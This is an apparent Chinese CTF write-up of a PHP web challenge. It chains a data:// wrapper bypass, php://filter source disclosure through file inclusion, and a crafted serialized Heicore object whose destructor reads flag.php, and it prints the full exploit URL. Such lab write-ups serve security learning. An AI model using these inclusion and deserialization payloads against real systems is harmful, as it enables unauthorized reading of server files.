【TSCTF

【TSCTF

题目地址：

打开是个没用的网站，扫描一下~

访问/robots.txt，发现三个文件：

User-agent: *
Disallow: /relax.php
Disallow: /heicore.php
Disallow: /flag.php

其中只有/relax.php里有东西，查看源码：

这个是aaencode代码，直接扔进控制台运行，或者在线解密：

整理得：

$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {echo '<img src="./images/13.jpg" alt=""><br>';include($__);
} else {echo '<img src="./images/1.gif" alt="">';
}

其中file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three"可以用data://伪协议绕过；
下面还有个include($__);，想用file=flag.php用include来包含flag，却回显“It’s not that simple”，是我太天真了！
于是构造php://filter伪协议来读取heicore.php和relax.php的源码
heicore.php:

<?php
class Heicore{public $file;public function __destruct(){if(isset($this->file)){echo file_get_contents($this->file);}}
}

relax.php:

<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if(isset($_)&&(file_get_contents($_,'r')==="Two thousand three hundred and thirty-three")){echo '<img src="./images/13.jpg" alt=""><br>';if(preg_match("/flag/i",$__)){echo "It's not that simple";exit();}else{include($__);unserialize($___);}}elseecho '<img src="./images/1.gif" alt="">';  }    ?>

终于拿到了完整的源码，的确是过滤了flag
可以看到heicore.php中的析构函数会输出$file，所以把它包含进来，并让其成员$file等于flag.php，由于调用了函数unserialize()，我们就利用反序列化触发魔术方法__destruct()来输出flag；

<?php
class Heicore {public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';}
$a = new Heicore();
$b = serialize($a);
echo $b;
#O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

构造的payload：

?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

解base64